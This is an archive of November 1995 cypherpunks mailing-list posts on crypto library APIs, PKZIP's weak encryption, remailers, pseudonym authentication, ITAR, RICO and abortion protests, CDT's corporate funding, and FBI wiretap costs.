To encrypt data, you create an encryption context, load a user key into it, en/decrypt data, and destroy it when you've finished. This concept lends itself to implementation either as a C++ class or as C routines. The library has been written to be as idiot-proof as possible. On initialization it performs extensive self-testing against test data from encryption standards documents, and the API's check each parameter and function call for errors before any actions are performed, with error reporting down to the level of individual parameters. The library API serves as an interface to a range of plug-in encryption modules which allow encryption algorithms to be added in a fairly transparent manner. The standardised API allows any of the algorithms and modes supported by the library to be used with a minimum of coding effort. As such the main function of the library is to provide a standard, portable, easy-to-use interface between the underlying encryption routines and the user software. All code is plain ANSI C, with no machine or OS-specific functions or calls being used. Peter. From anonymous-remailer at shell.portal.com Tue Nov 21 04:41:06 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Tue, 21 Nov 1995 20:41:06 +0800 Subject: "Junk E-Mail" Message-ID: <199511211219.EAA10354@jobe.shell.portal.com> On Tue, 21 Nov 1995, Rich Salz wrote: > >RICO is very serious stuff. Criminal prosecution under the terms of the > > Like Operation Rescue? My apologies, I'm sorry but I don't understand this reference. What does Operation Rescue have to do with the seriousness of RICO? What is Operation Rescue? I am definitely not an expert on foreign statute. Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. 
From ylo at cs.hut.fi Tue Nov 21 04:46:35 1995 From: ylo at cs.hut.fi (Tatu Ylonen) Date: Tue, 21 Nov 1995 20:46:35 +0800 Subject: NSA, ITAR, NCSA and plug-in hooks. In-Reply-To: <199511180319.UAA07399@usr5.primenet.com> Message-ID: <199511210110.CAA00878@trance.olari.clinet.fi> > PKZIP allows encryption (other's ?). How about a hook to that? PKZIP "encryption" is self-deception. A program for cracking it, PKCRACK, is widely available on the internet. See e.g. ftp.funet.fi:/pub/crypt/analysis. [For information about internationally available cryptographic software, see http://www.cs.hut.fi/crypto.] Tatu Ylonen From eay at mincom.oz.au Tue Nov 21 04:49:37 1995 From: eay at mincom.oz.au (Eric Young) Date: Tue, 21 Nov 1995 20:49:37 +0800 Subject: cryptl99.zip Free encryption library for DOS/UNIX/Windows (fwd) In-Reply-To: Message-ID: On Tue, 21 Nov 1995, Enzo Michelangeli wrote: > This encryption library provides a universal interface to a number of > conventional-key encryption algorithms. The library currently supports > encryption algorithms and modes of MDC/SHS CFB, DES ECB, CBC, CFB, OFB, PCBC, > triple DES ECB, CBC, CFB, OFB, IDEA ECB, CBC, CFB, OFB, RC4, SAFER ECB, CBC, > CFB, OFB, and SAFER-SK ECB, CBC, CFB, OFB. All encryption routines are :-) cute, the next version of SSLeay to be released will have the same thing, good to see great minds think alike (or is that simple minds seldom differ :-). 
Currently the interface I will have is

EVP_EncryptInit(EVP_CIPHER_CTX *ctx,EVP_CIPHER *type,unsigned char *key,
        unsigned char *iv);
void EVP_EncryptUpdate(EVP_CIPHER_CTX *ctx,unsigned char *out,int *outl,
        unsigned char *in,int inl);
void EVP_EncryptFinal(EVP_CIPHER_CTX *ctx,unsigned char *out,int *outl);

with a string to bytes function,

int EVP_BytesToKey(EVP_CIPHER *type,EVP_MD *md,unsigned char *salt,
        unsigned char *data,int datal,int count,
        unsigned char *key,unsigned char *iv);

this is upward compatible with PKCS#5 and will generate a key and iv of the correct size depending on the EVP_CIPHER for a data string (the lengths are encoded in the EVP_CIPHER definition).

I also have all my Message digest routines using the same type of interface. What makes this nice is that all my digital signature routines (open, seal, sign, verify etc) all take EVP_CIPHER and EVP_MD arguments so any cipher can be used and any MD can be used. The ASN1 object identifiers are contained in the EVP_CIPHER/EVP_MD structures. It also makes the 'demo' program that supports all the above mentioned encryption modes (and also does base64 encoding/decoding) only 290 lines long :-).

Now, here's the rub, to use a cipher to encode in pkcs#7 (which is what S/MIME is using) one needs to have an object identifier (for use in the ASN1 encoding). I know of very few object identifiers.

type                    object identifier.
EVP_des_ecb             1 3 14 3 2 6
EVP_des_ede
EVP_des_ede3            1 2 840 113549 3 17 (or is this EVP_des_ede (2 keys))
EVP_des_cfb             1 3 14 3 2 9
EVP_des_ede_cfb
EVP_des_ede3_cfb
EVP_des_ofb             1 3 14 3 2 8
EVP_des_ede_ofb
EVP_des_ede3_ofb
EVP_des_cbc             1 3 14 3 2 7
EVP_des_ede_cbc
EVP_des_ede3_cbc
EVP_rc4                 1 2 840 113549 3 4
EVP_idea_ecb
EVP_idea_cfb
EVP_idea_ofb
EVP_idea_cbc
MD_md2                  1 2 840 113549 2 2
MD_md5                  1 2 840 113549 2 5
MD_sha                  1 3 14 3 2 18

Can anyone out there fill in the blanks? I also suppose the new version of SHA, SHA-1 will also have a different identifier as well which I will also need.
In the above, I always use 'ede' to refer to encrypt-decrypt-encrypt with 2 keys and 'ede3' to refer to ede with three keys. eric (on a quest for object identifiers... and to finish the next version of SSLeay before he goes on a long holiday...) From loki at obscura.com Tue Nov 21 21:37:43 1995 From: loki at obscura.com (Lance Cottrell) Date: Tue, 21 Nov 95 21:37:43 PST Subject: Syrinx Remailer is no more Message-ID: -----BEGIN PGP SIGNED MESSAGE----- This is the kind of announcement which really needs to be authenticated. I will leave syrinx on my list until I see a signed message confirming this announcement. If we do not bother to authenticate this kind of message, why bother with all the crypto, here is the mother of all denial of service attacks. -Lance At 7:22 PM 11/21/95, Sam Kaplin wrote: >Effective immediately syrinx at c2.org is no more. I no longer have the >time to keep this remailer up and running. Perhaps somewhere down the >line I will set up another one. Please remove Syrinx from your chains. > >Sam -----BEGIN PGP SIGNATURE----- Version: 2.6.2 -----END PGP SIGNATURE----- ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come."
--Nietzsche ---------------------------------------------------------- From hallam at w3.org Tue Nov 21 21:45:56 1995 From: hallam at w3.org (hallam at w3.org) Date: Tue, 21 Nov 95 21:45:56 PST Subject: Java & Netscape security [NOISE] In-Reply-To: Message-ID: <9511220545.AA01344@zorch.w3.org> I'm not sure where the policy of whether posts from foo.com should be considered policy of foo.com but they certainly are considered in that manner. Rather than have this discussion here how about people read up the threat in Hal Abelson's course on Ethics of the Electronic frontier? http://swissnet.ai.mit.edu/6095/on-line-discussion/topic-1/ One point to be made is that at Universities we all have university accounts because people realise that there is no connection between our views and institute policy. The freedom to hold unpopular views being part of what universities are all about. On the other hand there is no such assumption concerning posts from foo.com. I suspect that even in the UK one could sack an employee for making stupid statements from an Internet account. Particularly if they might lead a person to doubt the sanity of the person concerned. On Phil Stromer, I don't think the Internet posts were the only point at issue. He was very offensive however, it was not merely the views he posted but the manner in which he made them that caused offense. He also made a lot of assertions concerning other posters which might have led to legal action against Sun. Phill From sinclai at ecf.toronto.edu Tue Nov 21 05:51:32 1995 From: sinclai at ecf.toronto.edu (SINCLAIR DOUGLAS N) Date: Tue, 21 Nov 1995 21:51:32 +0800 Subject: Virus attacks on PGP In-Reply-To: <199511210732.XAA04912@netcom18.netcom.com> Message-ID: <95Nov21.083447edt.10061@cannon.ecf.toronto.edu> > Certainly having PGP run from a CDROM or other read-only device would be a > big help. Even better would be to have all the privileged code also run > from a read-only device.
Seeing as PGP is quite small the simplest and cheapest read-only device would be a write-protected floppy disk. Could a virus write to a write-protected disk? I'm not sure if the protection is done in the BIOS or the drive hardware. From anonymous-remailer at shell.portal.com Tue Nov 21 06:27:43 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Tue, 21 Nov 1995 22:27:43 +0800 Subject: toolkits? Message-ID: <199511211405.GAA17363@jobe.shell.portal.com> Alice here ... On Wed, 8 Nov 1995, Daniel R. Oelke, wrote: > > Now we're getting specific. These are things that us ordinary folk can do > > which show the 'leaders' how to follow. What software, hardware, > > applications, support and sysadmin experience is required and where is it > > available on what terms. What are the cash flow opportunities to support > > such services? By "cash flow-opportunities", is this the "opportunity-cost" of providing services?? The foregone profits of today. Or is this the future cash flow opportunities which could arise from this type of activity. The future assets of tomorrow? Essentially, doesn't all of this reduce to "valuing" in present dollar terms (i.e. attaching a discounted present value through some appropriate hurdle rate) to some level of future benefit. The real issue as I see it, is finding some way to actually "fund" that hazy discounted present value. > A good service would be to provide and support distribution of > of privacy enhancing tools to universities and companies that > want them. i.e. have people who will help set up firewalls, > PGP, encrypted telnet (pick your flavor), etc. As long as it of course *obviously* excludes product like Netscape Navigator -- the black-box code with significant security holes and flaws -- I'd have to agree that this is in fact a very good idea. But it requires forward-thinking. It's no different actually than paying someone for what they know, rather than paying them for what they do.
> Yes - I know that most of this stuff is out there already, > but having people *willing* to integrate it for you without > charging an arm and a leg would go a long way towards convincing the > suits that this is a *good* thing. It sounds good on the surface. In fact the liaison officer / integrator might even establish some valuable "working relationships". I think that this form of thinking is what will define who will be long term players in this industry -- and who won't. Those who are able to build "goodwill" will survive and flourish, while the others will flounder. If I may paraphrase, I believe that Dan is speaking possibly of loss-leader services. Services which do not in actuality show presently as "high value-added" under our antiquated systems of accounting and measurement. Services which might in fact reduce short-term "profits" because they are "current-expensed" rather than being recognized as the deferred assets, they in fact truly are. (Essentially, the same problem we've visited with R&D expenses. The problem where the "solution" is defined as cutting R&D expense, so that there is increased "profit", although long-term health and corporate competitiveness is actually weakened. A true management accounting paradox.) There should be a re-focus onto a horizon that is somewhat longer than the current quarter. Or the current day, for that matter, or the current moment. Unfortunately, these types of "forward-thinking" plans and projects all require current funds. Money. And lots of it, before they start showing and generating "measurable" returns. It really is the laying and strengthening of foundations. And who has the authority to spend any money on "wasteful" foundations?? If no one funds these types of projects, either jointly or individually, then these projects and bright ideas invariably go absolutely nowhere.
> Dan > ------------------------------------------------------------------ > Dan Oelke Alcatel Network Systems > droelke at aud.alcatel.com Richardson, TX Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From karn at unix.ka9q.ampr.org Tue Nov 21 06:32:03 1995 From: karn at unix.ka9q.ampr.org (Phil Karn) Date: Tue, 21 Nov 1995 22:32:03 +0800 Subject: Applied Cryptography case filings on the Web Message-ID: <199511210500.VAA01678@unix.ka9q.ampr.org> The government has filed its Motion to Dismiss, or In The Alternative, For Summary Judgment in the case of Karn vs State Dept. This case challenges the arbitrary Commodity Jurisdiction Request rulings made for the book Applied Cryptography and for a floppy disk containing the same source code printed in the book. I've begun scanning in and HTMLizing the various government documents, some of which are sizeable. As I finish them I'm putting them up on my web page. Please feel free to pass around this URL: http://www.qualcomm.com/people/pkarn/export/index.html --Phil From nelson at crynwr.com Tue Nov 21 06:46:14 1995 From: nelson at crynwr.com (Russell Nelson) Date: Tue, 21 Nov 1995 22:46:14 +0800 Subject: toolkits? In-Reply-To: <199511211405.GAA17363@jobe.shell.portal.com> Message-ID: anonymous-remailer at shell.portal.com writes: > Alice here ... How do we know this for a fact? -russ http://www.crynwr.com/~nelson Crynwr Software | Crynwr Software sells packet driver support | PGP ok 11 Grant St. | +1 315 268 1925 (9201 FAX) | Neither is a good choice: Potsdam, NY 13676 | Abortion is murder; forced childbirth is slavery. From droelke at spirit.aud.alcatel.com Tue Nov 21 07:21:03 1995 From: droelke at spirit.aud.alcatel.com (Daniel R. 
Oelke) Date: Tue, 21 Nov 1995 23:21:03 +0800 Subject: Get your own ITAR Message-ID: <9511211457.AA03654@spirit.aud.alcatel.com> I just called this number and was given the following instructions: Fax your request to (703)875-6647 Attn Donna Davis, include your name and address. Allow 10-15 days for US mail or include your Fed-Ex account number for faster service. Enjoy, Dan > > 1 703 875 6644. > The kindly administrative assistant there will take your name and address > and send you a hardcopy of the ITAR regulations. I don't know about > overseas mailings. I also imagine you will have to wait until the current > US budget stale-mate is resolved. (Thanks to digest-reader walt at osf.org > for the phone number.) > /r$ > ------------------------------------------------------------------ Dan Oelke Alcatel Network Systems droelke at aud.alcatel.com Richardson, TX From dreschs at mpd.tandem.com Tue Nov 21 08:27:09 1995 From: dreschs at mpd.tandem.com (Sten Drescher) Date: Wed, 22 Nov 1995 00:27:09 +0800 Subject: "Junk E-Mail" In-Reply-To: <199511210955.BAA16150@jobe.shell.portal.com> Message-ID: <199511211546.JAA04806@galil.austnsc.tandem.com> anonymous-remailer at shell.portal.com said: a> On Mon, 20 Nov 1995 hallam at w3.org wrote: >> I think it would be better to slap a RICO suit onto the company >> concerned. It sound to me like an attempt to gain financial advantage >> through threatening behaviour. Where I come from that means jail >> time. a> RICO is very serious stuff. Criminal prosecution under the terms of a> the Racketeer-Influenced & Corrupt Organizations Act is reserved for a> very serious situations indeed. It's true "rubber hose" stuff. a> It was intended as a tool for use against mobsters, but US attorneys a> have used it against white-collar criminals. I think, you'd have to a> have strong evidence of an ongoing "criminal enterprise", which I a> don't think you have with junk e-mail. 
Actually, they've started using it against vicious reversed-black-collar (and non-collared) criminals for daring to exercise their right under the first amendment to peaceably protest. -- #include /* Sten Drescher */ To get my PGP public key, send me email with your public key and Subject: PGP key exchange Key fingerprint = 90 5F 1D FD A6 7C 84 5E A9 D3 90 16 B2 44 C4 F3 From dreschs at mpd.tandem.com Tue Nov 21 08:27:48 1995 From: dreschs at mpd.tandem.com (Sten Drescher) Date: Wed, 22 Nov 1995 00:27:48 +0800 Subject: "Junk E-Mail" In-Reply-To: <199511211219.EAA10354@jobe.shell.portal.com> Message-ID: <199511211551.JAA04817@galil.austnsc.tandem.com> anonymous-remailer at shell.portal.com said: a> On Tue, 21 Nov 1995, Rich Salz wrote: >> >RICO is very serious stuff. Criminal prosecution under the terms of >> the >> >> Like Operation Rescue? a> My apologies, I'm sorry but I don't understand this reference. What a> does Operation Rescue have to do with the seriousness of RICO? What a> is Operation Rescue? a> I am definitely not an expert on foreign statute. They (as in, the government) have used the RICO laws against Operation Rescue, an anti-abortion/pro-life (pick your term) group for protesting/picketing abortion clinics and doctors who perform abortions. If they had prosecuted under statutes which applied to everyone, I wouldn't have had a problem, but they are going after OR and similar organizations for using tactics similar to those used by civil rights protesters in the 60s. 'Course, civil rights is Politically Correct. Abortion rights is Politically Correct. Protesting abortion is Politically Incorrect, therefore illegal.
-- #include /* Sten Drescher */ To get my PGP public key, send me email with your public key and Subject: PGP key exchange Key fingerprint = 90 5F 1D FD A6 7C 84 5E A9 D3 90 16 B2 44 C4 F3 From pcw at access.digex.net Tue Nov 21 08:34:58 1995 From: pcw at access.digex.net (Peter Wayner) Date: Wed, 22 Nov 1995 00:34:58 +0800 Subject: Are there enough FBI agents to handle Digital Telephony????? Message-ID: Has anyone ever done the math on the FBI's new wire tapping proposals and determined whether they'll have enough agents to do all of the listening? Doesn't a court ordered wire tap require that people listen in and screen the recordings. Does this have to be in real time? I can't remember, but I think there is a fairly onerous evidentiary chain required to use this technology. For instance, if 1% of America is on the phone during the peak hours of the day, then that puts 2.5 million Americans on the phone or 1.25 million conversations. If the FBI wants access to 1% of that, that is still 12,500 simultaneous conversations. That would seem to imply 12,500 people to listen to the tapes, right? Would that take agents off the streets? 12,500 agents would cost $1.2 billion a year if they each cost about $100,000 in salary and benefits. But we need to account for vacations, shift work and testifying at the trials of the drug lords who are sent to jail. Let's assume that you only need 1/10th the people to handle the two evening shifts. That gives you a cost of $1.4 billion before vacations. Adding 40% to cover vacation and weekends puts you close to $2 billion. Let's round up. So it would cost $2 billion just to use the information here. This leads me to believe that they're thinking of building automatic voice recognition equipment in the future. What does anyone think of the numbers?
-Peter Wayner From anonymous-remailer at shell.portal.com Tue Nov 21 08:35:33 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Wed, 22 Nov 1995 00:35:33 +0800 Subject: toolkits? Message-ID: <199511211555.HAA27530@jobe.shell.portal.com> [note cunning copy of Alice type quoting style, and cunning use of the same remailer as the last in the chain] On Tue, 21 Nov 1995, Russell Nelson wrote: > anonymous-remailer at shell.portal.com writes: > > Alice here ... > > How do we know this for a fact? We don't. As an incentive for Alice to generate herself a PGP key, I hereby place Alice on notice that if she doesn't sign her next post, and provide a PGP key, I will create one for her, and steal all the positive (?) reputation that she has developed so far. You have 24 hours Alice, otherwise a key gets posted to here, and to the keyservers with your nym on it. [someone masquerading as] Alice de 'nonymous ... [who will soon steal her nym (as an experiment in Nym misappropriation, and reputation theft from those who don't use authentication). Evolution in action :-)] ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From rah at shipwright.com Tue Nov 21 09:27:22 1995 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 22 Nov 1995 01:27:22 +0800 Subject: Are there enough FBI agents to handle Digital Telephony????? Message-ID: >Has anyone ever done the math on the FBI's new wire tapping >proposals and determined whether they'll have enough agents to >do all of the listening? Hettinga's Corollary to Gilmore's Law ("Censorship is Damage") In a geodesic network, one node can't route all the traffic. It will choke. Cheers, Bob ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional."
--Thomas Sowell The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From rah at shipwright.com Tue Nov 21 09:29:48 1995 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 22 Nov 1995 01:29:48 +0800 Subject: FW: Electronic Commerce and the Internet (6/96 CACM) Message-ID: --- begin forwarded text From: Fisher Mark To: www-buyinfo Subject: FW: Electronic Commerce and the Internet (6/96 CACM) Date: Tue, 21 Nov 95 09:21:00 PST Encoding: 61 TEXT >From the net-happenings list... ========================= From: Gleason Sackman Date: Mon, 20 Nov 1995 10:36:42 -0600 (CST) Subject: WWW> CALL FOR PAPERS: Electronic Commerce and the Internet From: raustin at netcom.com (Rick Austin) Date: Fri, 10 Nov 1995 03:11:56 GMT Call for Papers: Interested authors are encouraged to submit manuscripts for feature articles on Electronic Commerce and the Internet. Six papers are sought for a special feature for the June 1996 issue of the Communications of the ACM (CACM). Co-Guest Editors for the feature are Rick Austin and Ray Pyle of the Bell Atlantic Internet Services Center. Guidelines: Articles should be written for a general audience consisting of a range of experience and backgrounds, but aimed at the general practitioner. 7000 to 10,000 words 3 to 5 graphic inserts (optional) Topics: Internet Security Electronic Commerce Security Digital Signature Digital Cash Firewalls and gateways MIME and attachments Integrated EDI/Internet Effectiveness of the Internet for commerce Advances in Electronic Commerce Etc. Schedule: Finished manuscripts and Author Bio due December 1, 1995. Editors comments back by December 15, 1995 Photo Ready copy due Jan 10 1996. Mail or Email to Raymond Pyle 13100 Columbia Pk E47 Silver Spring, Md. 
20904 raymond.h.pyle at bell-atl.com ====================================================================== Mark Leighton Fisher Thomson Consumer Electronics fisherm at indy.tce.com Indianapolis, IN --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From ericande at cnw.com Tue Nov 21 09:36:38 1995 From: ericande at cnw.com (Eric Anderson) Date: Wed, 22 Nov 1995 01:36:38 +0800 Subject: Using anon.remailers Message-ID: <01BAB7EF.4FB8FC60@king1-02.cnw.com> Would someone point me to where I can read about how to use the cypherpunk and mixmaster type of anon.remailers? Thanks, Eric From JWRCLUM at aol.com Tue Nov 21 09:38:32 1995 From: JWRCLUM at aol.com (JWRCLUM at aol.com) Date: Wed, 22 Nov 1995 01:38:32 +0800 Subject: Fwd: Corporate Crime and CDT Funding on behalf of so-called medical privacy Message-ID: <951121120109_29631303@emout04.mail.aol.com> --------------------- Forwarded message: From: gcook at tigger.jvnc.net (Gordon Cook) Sender: med-privacy at essential.org Reply-to: gcook at tigger.jvnc.net To: med-privacy at essential.org (Multiple recipients of list) Date: 95-11-20 22:44:48 EST The following article appeared in the current issue of Corporate Crime Reporter (Volume 9, Number 44, November 20, 1995, page one). It is redisseminated on the Internet with the permission of CCR. SELF-PROCLAIMED "PUBLIC INTEREST" GROUP HEAVILY FUNDED BY COMPUTER, TELECOMMUNICATIONS, DATABANK CORPORATIONS THAT WOULD BENEFIT FROM "MEDICAL PRIVACY" LEGISLATION GROUP SUPPORTS -- EQUIFAX, TRW, DUNN & BRADSTREET IN THE MIX The Center for Democracy & Technology (CDT), a self-proclaimed "public interest organization," is in fact heavily funded by large private computer, telecommunications, and databank corporations.
Funders of CDT, a two-year old Washington, D.C.-based advocacy organization, include Dunn & Bradstreet Corp., Equifax Inc., and TRW Information Services, three large databank corporations that stand to benefit from federal legislation CDT actively helped shape and is shepherding through Congress. This year, CDT has received $699,643 from more than 30 large corporations, including $100,000 from Microsoft, $75,000 from AT&T, $60,000 from Bell Atlantic, $50,000 from Apple Computer, $25,000 from IBM, $10,000 from TRW Information Services, $10,000 from Dunn & Bradstreet, $5,000 from Direct Marketing Association, and $5,000 from Equifax Inc. (For a complete list of CDT's funders, see At A Glance, page 16) At a hearing before the Senate Labor and Human Resources Committee last week, CDT deputy director Janlori Goldman said that CDT "strongly supports" legislation, S. 1360, sponsored by Senators Robert Bennett (R-Utah) and Patrick Leahy (D-Vermont), because it represents "the most comprehensive and strong privacy bill the Congress has yet considered in this area." But opponents of the bill argue that the legislation is not a privacy statute at all, but instead is a vehicle that would legitimize the creation of large computerized databanks of personal medical information, thus benefitting those companies like TRW and Equifax that give financial support to CDT. The legislation would allow for broad, unauthorized searches of those databanks, opponents claim. In an interview, Goldman told Corporate Crime Reporter that all of CDT's corporate funding is earmarked for other projects and that none of the corporate funding is supporting her work on the medical privacy bill. "The corporate funding is not related at all, in any way shape or form to my work on this bill," Goldman said. "The reason we are doing this bill is that I've worked on privacy issues for a decade. The most important privacy issue to work on is the passage of the medical records privacy legislation.
That is a very sincere issue for me." "None of the corporate support that CDT gets is related to my work on this bill," Goldman emphasized. "None. Zippo." CDT's executive director, Jerry Berman agreed. "We have no funding for the medical privacy project -- zero," Berman said. But critics of the CDT's position on the legislation were skeptical. "During the Senate hearing this week, Senator Bennett was angered at the suggestion that S. 1360 was an industry bill," said Jamie Love of Ralph Nader's Center for Study of Responsive Law. "He claimed that he had widely consulted with privacy groups and patient advocates. CDT's Janlori Goldman was the key person who decided who was in the loop, and who was not in the loop on this issue. Groups that were not receptive to the idea of massive database systems of personal medical records were excluded from deliberations." "To find out that CDT has been funded by companies such as Equifax, TRW, Dunn & Bradstreet, IBM and the telephone companies is remarkable, because these are among the groups who have the most at stake in legitimizing and preserving the current system of maintaining and managing medical records," Love said. "I think that Janlori Goldman should have mentioned in her Senate testimony that CDT was funded by corporations who have an interest in this issue." "If CDT were doing its job, TRW and Equifax wouldn't want to give it money," Love added. Harold Eist, president-elect of the American Psychiatric Association, said that "any datagathering and large computer company would clearly benefit from legislation that drives large amounts of individually identified data about American citizens into data banks without the knowledge and permission of those American citizens." "Selling that information would represent a gold mine for those companies," Eist said. 
"It is not surprising that an organization with a disingenuous name -- Center for Democracy & Technology -- would be supporting a bill with a disingenuous name -- The Medical Records Confidentiality Act," Eist said. "In fact, this bill represents an effort to give away the privacy of American citizens without their knowledge." "My understanding is that Janlori Goldman was involved in writing the bill," Eist said. "It seems to me that as a former civil libertarian, she should know very well that there are loopholes in that bill regarding protections to privacy that you could drive a Mack truck through." "Unless people can be assured that their privacy will be protected, there is little or no chance that they will reveal the kind of tormented and dark secrets that they have to reveal to recover from their illnesses," Eist said. "Confidentially is the sine qua non of medical treatment, and especially if it is psychiatric medical treatment." A driving force behind the effort to derail the Bennett/Leahy bill is Denise Nagel, a Boston physician who organized the Coalition for Patient Rights of New England "to restore confidentiality to the doctor-patient relationship." Nagel refused to comment on CDT's funding. At the Senate hearing last week, Nagel told the committee "I have no industry ties." Nagel charged that S. 1360 was written "to advance the interests of certain segments of the computer, telecommunications, data processing and health-care industries." "With this bill they would be able to careen full speed ahead to develop data networks that will give innumerable people access to our medical records legally and without our knowledge," Nagel said. "I am convinced that S. 1360 is not at all primarily concerned with the confidentiality of medical records," Nagel told the committee. "It is just the opposite. It talks about informed consent, but then authorizes the creation of databases without patient knowledge or consent. 
It talks about individual rights, and then allows police broad authority to search databases directly instead of obtaining a specific record from the patient's doctor. It talks about civil and criminal sanctions, and then pre-empts all common law and most existing and future state statutes. It talks about ensuring personal privacy with respect to medical records, and then sets a ceiling rather than a floor on medical confidentiality."

AT A GLANCE: CENTER FOR DEMOCRACY AND TECHNOLOGY FUNDING, 1994-1995

American Advertising Federation      500.00
America Online, Inc.              25,000.00
Apple Computer Inc.               50,000.00
AT&T                              75,000.00
Bell Atlantic                     60,000.00
Business Software Alliance         6,000.00
Cellular Tellecomm Indust Assn    10,000.00
CompuServ                         30,000.00
Delphi Internet Services Corp     10,000.00
Direct Marketing Association       5,000.00
Dunn & Bradstreet Corp            10,000.00
EMA                                5,000.00
Equifax Inc.                       5,000.00
John Gilmore                       2,500.00
Hartford Foundation              153,000.00
IBM                               25,000.00
Information Technology Industry    5,000.00
Interactive Digital Software       5,000.00
Lotus                              6,250.00
MARC                              80,000.00
MCI Telecommunications            15,000.00
Microsoft                        100,000.00
National Cable Television Assn    15,000.00
Netscape Communications Corp       5,000.00
Newspaper Association of Am        5,000.00
Nynex Government Affairs          25,000.00
Pacific Telesis                   25,000.00
Prodigy Service Company           10,000.00
Software Publishers Assn          10,000.00
Time Warner Inc                    5,000.00
TRW Information Svcs              10,000.00
US Telephone Association          10,000.00
US West Inc                       10,000.00

Total Funding                    814,020.00

Received 1994                    114,377.00
Received 1995                    699,643.00
Total Funding                    814,020.00

Russell Mokhiber
russell at essential.org
voice: 202/429-6928

From nobody at REPLAY.COM Tue Nov 21 09:53:58 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Wed, 22 Nov 1995 01:53:58 +0800
Subject: "Junk E-Mail"
Message-ID: <199511211647.RAA15185@utopia.hacktic.nl>

Sten wrote:
> They (as in, the government) has used the RICO laws against
>Operation Rescue, an anti-abortion/pro-life (pick your term) group for
>protesting/picketing abortion clinics and doctors who perform abortions. And for successfully encouraging the murder of doctors. >If they had prosecuted under statutes which applied to everyone, I >wouldn't have had a problem, but they are going after OR and similar >organizations for using tactics similar to those used by civil rights >protesters in the 60s. Who were systematically arrested, beaten, teargassed, wiretapped, and even occasionally shot at. I *know*--I got firehosed, beaten, arrested, and wiretapped for what I did. That's why I'm a Cypherpunk now. OR has received far better treatment than the civil rights protesters ever did--or did I miss the news items reporting that Terry Randall and Ralph Reed had been assassinated, and that their lieutenants had been bumped off in black-bag jobs, and that their colleagues were chained down to chairs *in court*? > 'Course, civil rights is Politically Correct. >Abortion rights is Politically Correct. Protesting abortion is >Politically Incorrect, therefore illegal. Do you usually send nursery rhymes to mailing lists? From lull at acm.org Tue Nov 21 10:17:43 1995 From: lull at acm.org (John Lull) Date: Wed, 22 Nov 1995 02:17:43 +0800 Subject: Virus attacks on PGP In-Reply-To: <95Nov21.083447edt.10061@cannon.ecf.toronto.edu> Message-ID: <199511211743.JAA06639@ix8.ix.netcom.com> On Tue, 21 Nov 1995 08:34:46 -0500, you wrote: > Seeing as PGP is quite small the simplest and cheapest read-only device > would be a write-protected floppy disk. > > Could a virus write to a write-protected disk? I'm not sure if the > protection is done in the BIOS or the drive hardware. In the drive hardware. From s1113645 at tesla.cc.uottawa.ca Tue Nov 21 10:51:44 1995 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Wed, 22 Nov 1995 02:51:44 +0800 Subject: Proving I'm not Bob. 
Message-ID: I had an idea for an advertising based net-payment scheme that has a particular security flaw making it totally untrustworthy unless it is possible to prove that you are not a particular person (the publisher receiving the ad money) when consuming (viewing or otherwise) the ads. All its other flaws seem to be based on the same sort of identity denial problem. Damn! Any protocols, cryptographic or otherwise? TIA From tcmay at got.net Tue Nov 21 11:05:54 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 22 Nov 1995 03:05:54 +0800 Subject: Are there enough FBI agents to handle Digital Telephony????? Message-ID: At 4:05 PM 11/21/95, Peter Wayner wrote: >Has anyone ever done the math on the FBI's new wire tapping >proposals and determined whether they'll have enough agents to >do all of the listening? Doesn't a court ordered wire tap >require that people listen in and screen the recordings. Does >this have to be in real time? I can't remember, but I think >there is a fairly onerous evidentiary chain required to use this >technology. ... The manpower shortage can be solved by moving the listening step offshore, perhaps to one of the Caribbean islands that processes credit card slips. Even cheaper would be to subcontract out the listening to the relatively impoverished, but well-educated and English-trained, former Soviet bloc nations. For example, Romania or Bulgaria, or even Russia. They may still have the old listening infrastructure in place, although I hear that Stasi headquarters in the former DDR is now an acupuncture clinic. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments.
